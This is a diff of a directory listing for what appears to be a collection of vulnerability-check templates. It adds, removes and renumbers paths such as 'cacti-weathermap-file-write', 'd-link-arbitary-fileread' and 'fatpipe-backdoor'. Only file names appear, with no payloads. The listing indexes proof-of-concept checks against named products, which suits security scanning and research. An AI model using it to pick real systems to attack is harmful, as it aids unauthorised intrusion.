./poc/other/cacti-weathermap-file-write-831.yaml -./poc/other/cacti-weathermap-file-write-833.yaml +./poc/other/cacti-weathermap-file-write-832.yaml ./poc/other/cacti-weathermap-file-write.yaml ./poc/other/cacti-weathermap-file-write.yml ./poc/other/cacti-workflow-834.yaml @@ -57247,7 +57217,7 @@ ./poc/other/campaign-url-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/campaign-url-builder-plugin.yaml ./poc/other/campaign-url-builder.yaml -./poc/other/campaignmonitor-841.yaml +./poc/other/campaignmonitor-842.yaml ./poc/other/campaignmonitor-843.yaml ./poc/other/campaignmonitor.yaml ./poc/other/campsite.yaml 
@@ -57260,6 +57230,7 @@ ./poc/other/campus-directory-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/campus-directory-plugin.yaml ./poc/other/campus-directory.yaml +./poc/other/can-i-take-over-dns-852.yaml ./poc/other/can-i-take-over-dns.yaml ./poc/other/canal-admin.yaml ./poc/other/cancosoft-asset-management.yaml @@ -57610,13 +57581,13 @@ ./poc/other/ceph.yaml ./poc/other/cerberus-helpdesk.yaml ./poc/other/cerberus-malware.yaml -./poc/other/cerebro-panel-878.yaml ./poc/other/cerebro-panel-879.yaml ./poc/other/cerebro-panel-880.yaml +./poc/other/cerebro-panel-881.yaml ./poc/other/cerebro-panel.yaml ./poc/other/cerebro.yaml -./poc/other/certificate-validation-882.yaml ./poc/other/certificate-validation-883.yaml +./poc/other/certificate-validation-884.yaml ./poc/other/certificate-validation.yaml ./poc/other/cetc-工业防火墙.yaml ./poc/other/cf-geoplugin-58ca0142ffd9a9b2258c8cbb40585337.yaml @@ -57712,7 +57683,8 @@ ./poc/other/cgc-maintenance-mode-d395c79f773ee5d70312487be14f72dc.yaml ./poc/other/cgc-maintenance-mode.yaml ./poc/other/cgi-printenv-885.yaml -./poc/other/cgi-test-page-888.yaml +./poc/other/cgi-printenv.yaml +./poc/other/cgi-test-page-887.yaml ./poc/other/cgi-test-page-889.yaml ./poc/other/cgi-test-page-890.yaml ./poc/other/cgi-test-page.yaml @@ -57859,7 +57831,6 @@ ./poc/other/checkpoint-firewall-enum.yaml ./poc/other/checkpoint-panel-1.yaml ./poc/other/checkpoint-panel-2.yaml -./poc/other/checkpoint-panel-898.yaml ./poc/other/checkpoint-panel-899.yaml ./poc/other/checkpoint-panel.yaml ./poc/other/checkpoint-workflow.yaml @@ -57955,8 +57926,8 @@ ./poc/other/cip4-folder-download-widget.yaml ./poc/other/ciphermail-email-encryption-gateway.yaml ./poc/other/circarlife-setup-917.yaml +./poc/other/circarlife-setup-918.yaml ./poc/other/circarlife-setup-919.yaml -./poc/other/circarlife-setup-920.yaml ./poc/other/circarlife-setup-921.yaml ./poc/other/circarlife-workflow.yaml ./poc/other/circle-image-slider-with-lightbox-4fd17830432213426bf64fdc98490b12.yaml 
@@ -57979,6 +57950,7 @@ ./poc/other/citrix-access-gateway.yaml ./poc/other/citrix-metaframe.yaml ./poc/other/citrix-netscaler.yaml +./poc/other/citrix-oob-memory-read.yaml ./poc/other/citrix-receiver.yaml ./poc/other/citrix-workflow.yaml ./poc/other/citrix-xcp.yaml @@ -58071,7 +58043,7 @@ ./poc/other/clearfy-plugin.yaml ./poc/other/clearfy.yaml ./poc/other/clearpass-policy-manager-1000.yaml -./poc/other/clearpass-policy-manager-997.yaml +./poc/other/clearpass-policy-manager-1001.yaml ./poc/other/clearpass-policy-manager-998.yaml ./poc/other/clearpass-policy-manager-999.yaml ./poc/other/clearpass-policy-manager.yaml @@ -58142,8 +58114,8 @@ ./poc/other/client-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/client-portal-plugin.yaml ./poc/other/client-portal.yaml +./poc/other/clientaccesspolicy-1005.yaml ./poc/other/clientaccesspolicy-1006.yaml -./poc/other/clientaccesspolicy-1007.yaml ./poc/other/clientaccesspolicy.yaml ./poc/other/clientexec.yaml ./poc/other/clio-grow-form-0f4e293198ec169f18fb2dff762bdf30.yaml @@ -58395,7 +58367,7 @@ ./poc/other/codup-read-only-admin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/codup-read-only-admin-plugin.yaml ./poc/other/codup-read-only-admin.yaml -./poc/other/cofense-vision-panel-1141.yaml +./poc/other/cofense-vision-panel-1142.yaml ./poc/other/cofense-vision-panel.yaml ./poc/other/cogent-datahub.yaml ./poc/other/colasoft-mdp.yaml @@ -58774,7 +58746,6 @@ ./poc/other/contact-form-7-skins.yaml ./poc/other/contact-form-7-style-ba8463f8475723d7b9fa15f84254b841.yaml ./poc/other/contact-form-7-style.yaml -./poc/other/contact-form-7.yaml ./poc/other/contact-form-add-2770bbb352eafe34363256cb285ef179.yaml ./poc/other/contact-form-add-303736b9e91ff80899d370834b9fa7f2.yaml ./poc/other/contact-form-add-34b4a6bc490c1a27759b7a1aa3c2b1d4.yaml 
@@ -59507,6 +59478,7 @@ ./poc/other/cross-origin-opener-policy.yaml ./poc/other/cross-rss-80679996637c491ca713f9608717b246.yaml ./poc/other/cross-rss.yaml +./poc/other/crossdomain-xml-1267.yaml ./poc/other/crossdomain-xml-1268.yaml ./poc/other/crossdomain-xml-1269.yaml ./poc/other/crossdomin-xml.yaml @@ -59545,6 +59517,7 @@ ./poc/other/cryptocurrency-widgets-pack-df87c30565c27eb58e0271f0dfd6d08b.yaml ./poc/other/cryptocurrency-widgets-pack.yaml ./poc/other/cryptocurrency.yaml +./poc/other/csod-panel-1286.yaml ./poc/other/csod-panel-1287.yaml ./poc/other/csod-panel-1288.yaml ./poc/other/csod-panel-1289.yaml @@ -59851,6 +59824,7 @@ ./poc/other/custom-version.yaml ./poc/other/custom_nuclei-1.yaml ./poc/other/custom_nuclei-2.yaml +./poc/other/custom_nuclei-3.yaml ./poc/other/custom_nuclei-4.yaml ./poc/other/custom_nuclei-5.yaml ./poc/other/custom_nuclei-6.yaml @@ -59899,9 +59873,8 @@ ./poc/other/d-link-arbitary-fileread-7040.yaml ./poc/other/d-link-arbitary-fileread-7041.yaml ./poc/other/d-link-arbitary-fileread-7042.yaml -./poc/other/d-link-arbitary-fileread-7044.yaml +./poc/other/d-link-arbitary-fileread-7043.yaml ./poc/other/d-link-arbitary-fileread-7046.yaml -./poc/other/d-link-wireless-7047.yaml ./poc/other/d-link-wireless-7048.yaml ./poc/other/d-link-wireless-7049.yaml ./poc/other/d-link-wireless-7050.yaml @@ -60038,7 +60011,6 @@ ./poc/other/dd-post-carousel.yaml ./poc/other/dd-rating-abefceeefb99cff148ca67c77873866d.yaml ./poc/other/dd-rating.yaml -./poc/other/dead-host-with-cname-6786.yaml ./poc/other/dead-host-with-cname.yaml ./poc/other/deal-of-the-day-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/deal-of-the-day.yaml 
@@ -60069,6 +60041,7 @@ ./poc/other/defender-security-eb34b3c3b8ff1ca77abae88402bd4aa7.yaml ./poc/other/defender-security.yaml ./poc/other/deimos-c2-jarm.yaml +./poc/other/deimos-c2.yaml ./poc/other/dejavu-78b157490e17d28e7e04d9f12a1bb6bd.yaml ./poc/other/dejavu-8694503a0b15276ddaea2d6b4be99aaa.yaml ./poc/other/dejavu-9449ef76879953c9ac6d19c4c293def1.yaml @@ -60196,7 +60169,6 @@ ./poc/other/development-logs-2.yaml ./poc/other/development-logs-3.yaml ./poc/other/development-logs-6987.yaml -./poc/other/development-logs-6989.yaml ./poc/other/development-logs.yaml ./poc/other/devformatter-0473642f46ba628f35ee6f5a15e577ba.yaml ./poc/other/devformatter-4f0edd8cd8a7b5fcd66978824cc8f948.yaml @@ -60228,7 +60200,7 @@ ./poc/other/dialogs-plugin.yaml ./poc/other/dialogs.yaml ./poc/other/dian-diagnostics.yaml -./poc/other/diaowen-fileread(1).yaml +./poc/other/diaowen-fileread.yaml ./poc/other/diaowen-system.yaml ./poc/other/diary-31eb77eaefc61e112478e9f1952e822d.yaml ./poc/other/diary-9099a88f255af571eb05254581f8054d.yaml @@ -60267,6 +60239,7 @@ ./poc/other/diplomat-da700602e0176e1b1b6120899ff50989.yaml ./poc/other/diplomat.yaml ./poc/other/dir-contents-disc-logs-6999.yaml +./poc/other/dir-listing-7003.yaml ./poc/other/dir-listing-7004.yaml ./poc/other/dir-listing-7005.yaml ./poc/other/dir-listing-7007.yaml @@ -60397,9 +60370,11 @@ ./poc/other/dk-pricr-responsive-pricing-table-b16a43b12a77fac981f6dff5bee7fae6.yaml ./poc/other/dk-pricr-responsive-pricing-table-fcb02e31136900f66af826680ccfc854.yaml ./poc/other/dk-pricr-responsive-pricing-table.yaml +./poc/other/dlink-850l-info-leak-7035.yaml ./poc/other/dlink-850l-info-leak-7036.yaml ./poc/other/dlink-850l-info-leak-7037.yaml ./poc/other/dlink-850l-info-leak-7038.yaml +./poc/other/dlink-850l-info-leak-7039.yaml ./poc/other/dlink-850l-info-leak.yml ./poc/other/dlink-file-read.yaml ./poc/other/dlink-panel.yaml 
@@ -60408,7 +60383,6 @@ ./poc/other/dmxready-portfolio-manager.yaml ./poc/other/dnp-firewall.yaml ./poc/other/dns-multiple-example.yaml -./poc/other/dns-value-share-template-3.yaml ./poc/other/docebo-elearning-panel.yaml ./poc/other/docket-cache-29d289a525039ca1604e348c45bb194f.yaml ./poc/other/docket-cache-9d3b68fb0167e0f3e4bf3e86cef87a84.yaml @@ -60451,7 +60425,6 @@ ./poc/other/doko-theme.yaml ./poc/other/doko.yaml ./poc/other/dokuwiki-installer.yaml -./poc/other/dokuwiki-panel.yaml ./poc/other/dokuwiki.yaml ./poc/other/dolibarr-installer.yaml ./poc/other/dolibarr-panel.yaml @@ -60711,6 +60684,7 @@ ./poc/other/droit-elementor-addons-430c8b1464024c3ce26fa2faca084e29.yaml ./poc/other/droit-elementor-addons.yaml ./poc/other/drone-ci-panel-7090.yaml +./poc/other/drone-ci-panel-7091.yaml ./poc/other/drone-ci-panel.yaml ./poc/other/drone-ci-panel.yml ./poc/other/drop-shadow-boxes-19be81a9cc969d8ecc9f8b98996baee0.yaml @@ -60754,12 +60728,13 @@ ./poc/other/drugpak.yaml ./poc/other/druid-monitor-7100.yaml ./poc/other/druid-monitor-7101.yaml -./poc/other/druid-monitor-7103.yaml +./poc/other/druid-monitor-7102.yaml ./poc/other/druid-monitor-7104.yaml ./poc/other/druid-monitor.yaml ./poc/other/druid-panel.yaml ./poc/other/ds-site-message-875e5ff5a57ff63bfa2f151fee3c096b.yaml ./poc/other/ds-site-message.yaml +./poc/other/ds-store-file.yaml ./poc/other/ds-store-leak.yaml ./poc/other/ds-suit-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/ds-suit.yaml @@ -60781,6 +60756,7 @@ ./poc/other/dspace.yaml ./poc/other/dss-download-fileread-7116.yaml ./poc/other/dss-download-fileread-7117.yaml +./poc/other/dss-download-fileread.yaml ./poc/other/dsubscribers-74ac1eb0b977357b67ddd92eb354589f.yaml ./poc/other/dsubscribers-945733509c68d8720d9e8d2deb68c79f.yaml ./poc/other/dsubscribers-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -60923,8 +60899,7 @@ ./poc/other/dx-share-selection.yaml ./poc/other/dx-watermark-3bef3aced10727d0ec75e98bd1b40fca.yaml ./poc/other/dx-watermark.yaml -./poc/other/dxplanning-panel.yaml -./poc/other/dynamic-broadcast-receiver-7140.yaml +./poc/other/dynamic-broadcast-receiver-7141.yaml ./poc/other/dynamic-broadcast-receiver-7142.yaml ./poc/other/dynamic-broadcast-receiver.yaml ./poc/other/dynamic-content-for-elementor-74b47d0324febbea267a2d8f675a7149.yaml @@ -61110,6 +61085,7 @@ ./poc/other/easy-media-gallery-pro-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/easy-media-gallery-pro-listing-7150.yaml ./poc/other/easy-media-gallery-pro-listing-7151.yaml +./poc/other/easy-media-gallery-pro-listing-7152.yaml ./poc/other/easy-media-gallery-pro-listing-7153.yaml ./poc/other/easy-media-gallery-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/easy-media-gallery-pro-plugin.yaml @@ -61960,6 +61936,7 @@ ./poc/other/entrust-identityguard-1.yaml ./poc/other/entrust-identityguard-2.yaml ./poc/other/entrust-identityguard.yaml +./poc/other/env.yaml ./poc/other/envato-elements-1ca8761aad01c087e129c9ba5b7170f9.yaml ./poc/other/envato-elements.yaml ./poc/other/envialosimple-email-marketing-y-newsletters-gratis-61c9bb577c39ae281aa4842e613affa5.yaml @@ -61974,7 +61951,6 @@ ./poc/other/environment-rb.yaml ./poc/other/envision-gateway-7226.yaml ./poc/other/envision-gateway-7227.yaml -./poc/other/envision-gateway.yaml ./poc/other/envo-business-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/envo-business-709fcd2d01e6508e0448c347b88dab61.yaml ./poc/other/envo-business-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -62074,6 +62050,7 @@ ./poc/other/error-logs-7251.yaml ./poc/other/error-logs-7253.yaml ./poc/other/error-logs-7254.yaml +./poc/other/error-logs-7255.yaml ./poc/other/error-logs-7256.yaml ./poc/other/error-logs-8.yaml ./poc/other/error-logs-9.yaml 
@@ -62764,6 +62741,7 @@ ./poc/other/ezoic-integration-cce4dc27b5c66be86d956ad30a7a8970.yaml ./poc/other/ezoic-integration-cfe872c971b4228525dc363d4a798eb7.yaml ./poc/other/ezoic-integration.yaml +./poc/other/f-secure-policy-manager-7560.yaml ./poc/other/f-secure-policy-manager-7561.yaml ./poc/other/f-secure-policy-manager-7562.yaml ./poc/other/f-secure-policy-manager-7563.yaml @@ -62907,7 +62885,7 @@ ./poc/other/fathom-analytics.yaml ./poc/other/fatpipe-backdoor-7433.yaml ./poc/other/fatpipe-ipvpn-panel-7434.yaml -./poc/other/fatpipe-ipvpn-panel-7436.yaml +./poc/other/fatpipe-ipvpn-panel-7435.yaml ./poc/other/fatpipe-ipvpn-panel.yaml ./poc/other/fatpipe-mpvpn-panel.yaml ./poc/other/fatpipe-warp-panel.yaml @@ -63068,7 +63046,7 @@ ./poc/other/file-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/file-manager-plugin.yaml ./poc/other/file-manager.yaml -./poc/other/file-scheme-7468.yaml +./poc/other/file-scheme-7467.yaml ./poc/other/file-scheme-7469.yaml ./poc/other/file-scheme.yaml ./poc/other/filebird-61cf2f1a37771fa3cda817355d5faa22.yaml @@ -63098,6 +63076,7 @@ ./poc/other/filezilla-1.yaml ./poc/other/filezilla-2.yaml ./poc/other/filezilla-3.yaml +./poc/other/filezilla-7470.yaml ./poc/other/filezilla-7471.yaml ./poc/other/filezilla-phish.yaml ./poc/other/filezilla.yaml @@ -63774,6 +63753,7 @@ ./poc/other/formmail.yaml ./poc/other/formula-5b672e9f77cfd4654d3abf551473cec4.yaml ./poc/other/formula-b0133eeb83592f6bc091b8166dad158b.yaml +./poc/other/formula.yaml ./poc/other/forsun-科盾安全网关控制台.yaml ./poc/other/fortiadc-panel.yaml ./poc/other/fortiap-panel.yaml @@ -63785,7 +63765,6 @@ ./poc/other/fortinet-fortiddos-panel.yaml ./poc/other/fortinet-fortigate-panel-7534.yaml ./poc/other/fortinet-fortigate-panel-7535.yaml -./poc/other/fortinet-fortigate-panel-7536.yaml ./poc/other/fortinet-fortigate-panel.yaml ./poc/other/fortinet-fortigate.yaml ./poc/other/fortinet-fortiguard.yaml 
@@ -63825,7 +63804,6 @@ ./poc/other/fotography.yaml ./poc/other/fotomoto.yaml ./poc/other/foulenzer-advanced.yaml -./poc/other/foulenzer-subdomain-tk (copy 1).yaml ./poc/other/foulenzer-subdomain-tk.yaml ./poc/other/foulenzer-tech.yaml ./poc/other/founder-all-media-editing-system.yaml @@ -64388,7 +64366,7 @@ ./poc/other/geoserver.yaml ./poc/other/geotrust-cert.yaml ./poc/other/gerpgo-erp.yaml -./poc/other/gespage-panel-7605.yaml +./poc/other/gespage-panel-7606.yaml ./poc/other/gespage-panel.yaml ./poc/other/gespage-workflow.yaml ./poc/other/gestion-pymes-4e27f6575c1bbb81bb82fae9669ce875.yaml @@ -64406,7 +64384,6 @@ ./poc/other/get-env(1).yaml ./poc/other/get-env.yaml ./poc/other/get-iam-users.yaml -./poc/other/get-override-sni.yaml ./poc/other/get-query-string.yaml ./poc/other/get-site-to-phone-by-qr-code-53f9f187ffc31e706ad6ef27544d8f05.yaml ./poc/other/get-site-to-phone-by-qr-code.yaml @@ -64424,7 +64401,6 @@ ./poc/other/get-url-cron.yaml ./poc/other/get-without-scheme.yaml ./poc/other/get-your-number.yaml -./poc/other/get.yaml ./poc/other/getresponse-integration-e5d7fa71e6908442857a0cb0670fa481.yaml ./poc/other/getresponse-integration-fa4bcc5aa8ddc19efefa3934ed36cbc7.yaml ./poc/other/getresponse-integration.yaml @@ -64626,7 +64602,6 @@ ./poc/other/global-traffic-statistics.yaml ./poc/other/globalprotect-panel-1.yaml ./poc/other/globalprotect-panel-2.yaml -./poc/other/globalprotect-panel-7720.yaml ./poc/other/globalprotect-panel-7721.yaml ./poc/other/globalprotect-panel.yaml ./poc/other/globalsign-cert.yaml 
@@ -64641,11 +64616,10 @@ ./poc/other/glossary-by-codeat.yaml ./poc/other/glossword.yaml ./poc/other/glowroot-panel.yaml -./poc/other/glpi-directory-listing-7734.yaml +./poc/other/glpi-directory-listing.yaml ./poc/other/glpi-panel.yaml ./poc/other/glpi-workflow.yaml ./poc/other/glpi.yaml -./poc/other/glpidirectorylisting(1).yaml ./poc/other/glpidirectorylisting.yaml ./poc/other/gm-electronic-security-document-management-system.yaml ./poc/other/gm-woo-product-list-widget.yaml @@ -64685,7 +64659,7 @@ ./poc/other/gocodes.yaml ./poc/other/gocron-panel.yaml ./poc/other/gogs-panel.yaml -./poc/other/gogs-workflow.yaml +./poc/other/gogs-workflow-7760.yaml ./poc/other/gogs.yaml ./poc/other/golang-metrics.yaml ./poc/other/golangci-lint.yml @@ -64705,6 +64679,7 @@ ./poc/other/good-bad-comments-83f695fbf2f9017dee2e874c9671786d.yaml ./poc/other/good-bad-comments.yaml ./poc/other/good10000-tios.yaml +./poc/other/goodjob-dashboard.yaml ./poc/other/goodnews5-8ed36f6d7d78831e7535c4c75cee15dc.yaml ./poc/other/goodnews5.yaml ./poc/other/goodnex-78042e81e14608c6a526568b143d60ec.yaml @@ -64986,7 +64961,6 @@ ./poc/other/gzmwiccard-system.yaml ./poc/other/gzqxrh-system.yaml ./poc/other/gzsa-intranet-security.yaml -./poc/other/h2console-panel-7866.yaml ./poc/other/h2console-panel.yaml ./poc/other/h2csmuggle-nuclei.yaml ./poc/other/h2o-arbitary-file-read.yaml @@ -65008,11 +64982,11 @@ ./poc/other/h5p-css-editor.yaml ./poc/other/h5s-video-platform.yaml ./poc/other/h_ui.yaml -./poc/other/hack5-cloud-c2.yaml ./poc/other/hadoop-administration.yaml ./poc/other/hadoop-hue.yaml ./poc/other/haidaoshop.yaml ./poc/other/haitian-oa.yaml +./poc/other/haivision-gateway-panel.yaml ./poc/other/haivision-media-platform-panel.yaml ./poc/other/hal.yaml ./poc/other/hana-flv-player-7efa2a93c8c5a4eedc90aba0cfaa5f36.yaml 
@@ -65025,7 +64999,6 @@ ./poc/other/hanmasoft.yaml ./poc/other/hanming-lfr-7879.yaml ./poc/other/hanming-lfr-7880.yaml -./poc/other/hanming-lfr.yaml ./poc/other/hanna-drawing-service.yaml ./poc/other/hanwei-hazardous-chemicals-enterprise-early-warning-and-prevention-system.yaml ./poc/other/hanwei-integrated-business-platform.yaml @@ -65074,7 +65047,7 @@ ./poc/other/haproxy-status-7884.yaml ./poc/other/haproxy-status-7885.yaml ./poc/other/harbor-panel.yaml -./poc/other/harbor-workflow-7889.yaml +./poc/other/harbor-workflow.yaml ./poc/other/harbor.yaml ./poc/other/hash-elements-af3a85220968d357a0b931aa85d349a0.yaml ./poc/other/hash-elements-b3ac5ca2a781339a6e0e0f54ca2836eb.yaml @@ -65148,7 +65121,6 @@ ./poc/other/heat-trackr.yaml ./poc/other/heatmiser-wifi-thermostat-7923.yaml ./poc/other/heatmiser-wifi-thermostat-7924.yaml -./poc/other/heatmiser-wifi-thermostat.yaml ./poc/other/hejia-oa.yaml ./poc/other/hello-dolly.yaml ./poc/other/hello-elementor-4871f7fef9821ad7021876ca49006f78.yaml @@ -65226,7 +65198,7 @@ ./poc/other/hikvision-gateway-data-file-read.yaml ./poc/other/hikvision-iSecureCenter-fileread.yaml ./poc/other/hikvision-info-leak-7957.yaml -./poc/other/hikvision-info-leak-7958.yaml +./poc/other/hikvision-info-leak.yaml ./poc/other/hikvision-info-leak.yml ./poc/other/hikvision-ip-camera.yaml ./poc/other/hikvision-isecure-center.yaml @@ -65253,7 +65225,7 @@ ./poc/other/hitachi-virtual-storage-platform.yaml ./poc/other/hitron-technologies-7959.yaml ./poc/other/hitron-technologies-7960.yaml -./poc/other/hitron-technologies-7962.yaml +./poc/other/hitron-technologies-7961.yaml ./poc/other/hitron-technologies.yaml ./poc/other/hitsteps-visitor-manager-a4f14bcf46b90bf05fd86abc01d72e3e.yaml ./poc/other/hitsteps-visitor-manager-fc2fce71ebba70ebb2a3e464a40cd489.yaml 
@@ -65262,7 +65234,6 @@ ./poc/other/hivequeue-agent.yaml ./poc/other/hjtcloud-arbitrary-file-read-1.yaml ./poc/other/hjtcloud-arbitrary-file-read-2.yaml -./poc/other/hjtcloud-arbitrary-file-read-7967.yaml ./poc/other/hjtcloud-arbitrary-file-read-7968.yaml ./poc/other/hjtcloud-arbitrary-file-read-7969.yaml ./poc/other/hjtcloud-arbitrary-file-read-7970.yaml @@ -65272,10 +65243,10 @@ ./poc/other/hjtcloud-arbitrary-fileread.yml ./poc/other/hjtcloud-directory-file-leak.yaml ./poc/other/hjtcloud-directory-file-leak.yml -./poc/other/hjtcloud-rest-arbitrary-file-read-7973.yaml ./poc/other/hjtcloud-rest-arbitrary-file-read-7974.yaml ./poc/other/hjtcloud-rest-arbitrary-file-read-7975.yaml ./poc/other/hjtcloud-rest-arbitrary-file-read-7976.yaml +./poc/other/hjtcloud-rest-arbitrary-file-read.yaml ./poc/other/hjtcloud.yaml ./poc/other/hk-exif-tags-90d5c188e560ef7cd488e47fb557949a.yaml ./poc/other/hk-exif-tags.yaml @@ -65288,7 +65259,7 @@ ./poc/other/hmapsprem.yaml ./poc/other/hmc-hybris-panel-1.yaml ./poc/other/hmc-hybris-panel-2.yaml -./poc/other/hmc-hybris-panel-7977.yaml +./poc/other/hmc-hybris-panel-7978.yaml ./poc/other/hmc-hybris-panel.yaml ./poc/other/hmc.yaml ./poc/other/hmo.yaml @@ -65336,7 +65307,7 @@ ./poc/other/honeypress-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/honeypress-theme.yaml ./poc/other/honeypress.yaml -./poc/other/honeywell-building-control-7988.yaml +./poc/other/honeywell-building-control-7987.yaml ./poc/other/honeywell-building-control.yaml ./poc/other/honeywell-intermec-easylan.yaml ./poc/other/hookbot-rat.yaml 
@@ -65399,15 +65370,16 @@ ./poc/other/hover-image-e58166fa5204a405e1e321e94bba66de.yaml ./poc/other/hover-image.yaml ./poc/other/hp-3com-officeconnect-vpn-firewall.yaml +./poc/other/hp-ilo-5-8018.yaml ./poc/other/hp-ilo-5-8019.yaml -./poc/other/hp-ilo-5-8021.yaml +./poc/other/hp-ilo-5-8020.yaml ./poc/other/hp-ilo-5.yaml ./poc/other/hp-ilo.yaml ./poc/other/hp-pjl.yaml ./poc/other/hp-service-manager-1.yaml ./poc/other/hp-service-manager-2.yaml -./poc/other/hp-service-manager-8032.yaml ./poc/other/hp-service-manager-8033.yaml +./poc/other/hp-service-manager-8034.yaml ./poc/other/hp-service-manager.yaml ./poc/other/hp-sitescope.yaml ./poc/other/hp-system-management.yaml @@ -65421,7 +65393,6 @@ ./poc/other/hpe-officeconnect-switch-1920s-24g.yaml ./poc/other/hpe-system-management-anonymous-8011.yaml ./poc/other/hpe-system-management-anonymous-8012.yaml -./poc/other/hpe-system-management-anonymous-8013.yaml ./poc/other/hpe-system-management-anonymous.yaml ./poc/other/hphu-system.yaml ./poc/other/hqtheme-extra-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -65534,7 +65505,6 @@ ./poc/other/huawei-fusioncloud-desktop.yaml ./poc/other/huawei-fusioncompute.yaml ./poc/other/huawei-hg532e-panel-8065.yaml -./poc/other/huawei-hg532e-panel-8066.yaml ./poc/other/huawei-hg532e-panel.yaml ./poc/other/huawei-home-gateway-hg659-fileread.yaml ./poc/other/huawei-home-gateway-hg659-fileread.yml @@ -65566,6 +65536,7 @@ ./poc/other/huijietong-cloud-fileread-8084.yaml ./poc/other/huijietong-cloud-fileread-8085.yaml ./poc/other/huijietong-cloud-fileread-8087.yaml +./poc/other/huijietong-cloud-fileread.yaml ./poc/other/hummingbird-performance-1d4c893623ab0507c01647e1f1aef048.yaml ./poc/other/hummingbird-performance-3a7dcccc0d3fd5b9007fbcfe6711c67b.yaml ./poc/other/hummingbird-performance-67c4fcbf9696836879ccf2ec7679be61.yaml 
@@ -65699,9 +65670,7 @@ ./poc/other/identity-services-engine-2.yaml ./poc/other/identity-services-engine-8144.yaml ./poc/other/identity-services-engine-8145.yaml -./poc/other/identity-services-engine-8146.yaml ./poc/other/identity-services-engine.yaml -./poc/other/identityguard-selfservice-entrust-8142.yaml ./poc/other/identityguard-selfservice-entrust-8143.yaml ./poc/other/identityguard-selfservice-entrust.yaml ./poc/other/idonate-1ace5675b1d0e0c2c55b706529d8c6a1.yaml @@ -65973,7 +65942,6 @@ ./poc/other/imember360-fce3384b02a0b62b23a0533f7a66b6ca.yaml ./poc/other/imember360.yaml ./poc/other/imgallery.yaml -./poc/other/immich-panel.yaml ./poc/other/immopress-05c0761516bb8673f0817e0b7a55920e.yaml ./poc/other/immopress-185eb97d063feb8cfaf2be977bbfee57.yaml ./poc/other/immopress-5b8d08519480af5e15ca32c661720ed8.yaml @@ -66317,7 +66285,7 @@ ./poc/other/interactive-world-maps-fcdf26721454bc7cbb87f06418e98ace.yaml ./poc/other/interactive-world-maps.yaml ./poc/other/interactivevirtualshipdisplaysystem.yaml -./poc/other/interactsh-server-8165.yaml +./poc/other/interactsh-server.yaml ./poc/other/interactsh-stop-at-first-match.yaml ./poc/other/interactsh.yaml ./poc/other/interactsoftware-interact.yaml @@ -66341,7 +66309,7 @@ ./poc/other/internet-cluster-manager.yaml ./poc/other/internet-service-8176.yaml ./poc/other/internet-service-8177.yaml -./poc/other/internet-service.yaml +./poc/other/internet-service-8178.yaml ./poc/other/interred.yaml ./poc/other/interstingExtensions.yaml ./poc/other/intimate-io-cryptocurrency-payments-4a3a4bb7607630077f49d04dfa8de691.yaml @@ -66406,8 +66374,8 @@ ./poc/other/iomega-emc-shared-nas.yaml ./poc/other/ioncube-loader-wizard-1.yaml ./poc/other/ioncube-loader-wizard-2.yaml -./poc/other/ioncube-loader-wizard-8184.yaml ./poc/other/ioncube-loader-wizard-8185.yaml +./poc/other/ioncube-loader-wizard.yaml ./poc/other/ios-app-insecure-function.yaml ./poc/other/ios-app-min-ios.yaml ./poc/other/ios-app-permission-given.yaml 
@@ -66528,7 +66496,7 @@ ./poc/other/ithemes2.yaml ./poc/other/itop-panel-1.yaml ./poc/other/itop-panel-2.yaml -./poc/other/itop-panel-8204.yaml +./poc/other/itop-panel-8205.yaml ./poc/other/itop-panel.yaml ./poc/other/itop-workflow.yaml ./poc/other/iva-business-hours-pro-d4d29007dd18d8c7d97cfa243985305a.yaml @@ -66545,7 +66513,6 @@ ./poc/other/jaeger-ui-dashboard.yaml ./poc/other/jakarta-project.yaml ./poc/other/jamf-panel-8215.yaml -./poc/other/jamf-panel-8216.yaml ./poc/other/jamf-panel-8217.yaml ./poc/other/jamf-panel.yaml ./poc/other/jamf-pro-log4j.yaml @@ -66726,7 +66693,6 @@ ./poc/other/jfrog-8303.yaml ./poc/other/jfrog-8304.yaml ./poc/other/jfrog-8305.yaml -./poc/other/jfrog-8306.yaml ./poc/other/jfrog.yaml ./poc/other/jh-404-logger.yaml ./poc/other/jianhengxinan-jh-las.yaml @@ -66752,7 +66718,6 @@ ./poc/other/jivochat-66d916ce8710707a6a59f9da36d85732.yaml ./poc/other/jivochat.yaml ./poc/other/jixian-oa-video-file-file-read.yaml -./poc/other/jkstatus-manager-8344.yaml ./poc/other/jkstatus-manager-8345.yaml ./poc/other/jkstatus-manager-8346.yaml ./poc/other/jkstatus-manager-8347.yaml @@ -66762,7 +66727,7 @@ ./poc/other/jmx-console-8348.yaml ./poc/other/jmx-console-8349.yaml ./poc/other/jmx-console-8350.yaml -./poc/other/jmx-console-8352.yaml +./poc/other/jmx-console-8351.yaml ./poc/other/jmx-console.yaml ./poc/other/jnews-edf2392b68ac3fa89210511685b2df12.yaml ./poc/other/jnews.yaml @@ -66843,10 +66808,10 @@ ./poc/other/joliprint-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/joliprint-plugin.yaml ./poc/other/joliprint.yaml -./poc/other/jolokia-8367.yaml ./poc/other/jolokia-8368.yaml +./poc/other/jolokia-8369.yaml ./poc/other/jolokia-file-read-compilerdirectivesadd.yaml -./poc/other/jolokia-list-8360.yaml +./poc/other/jolokia-list-8361.yaml ./poc/other/jolokia-list.yaml ./poc/other/jolokia.yaml ./poc/other/jonradio-private-site-e2ec9bf6240f7a69f44d8e270b286828.yaml 
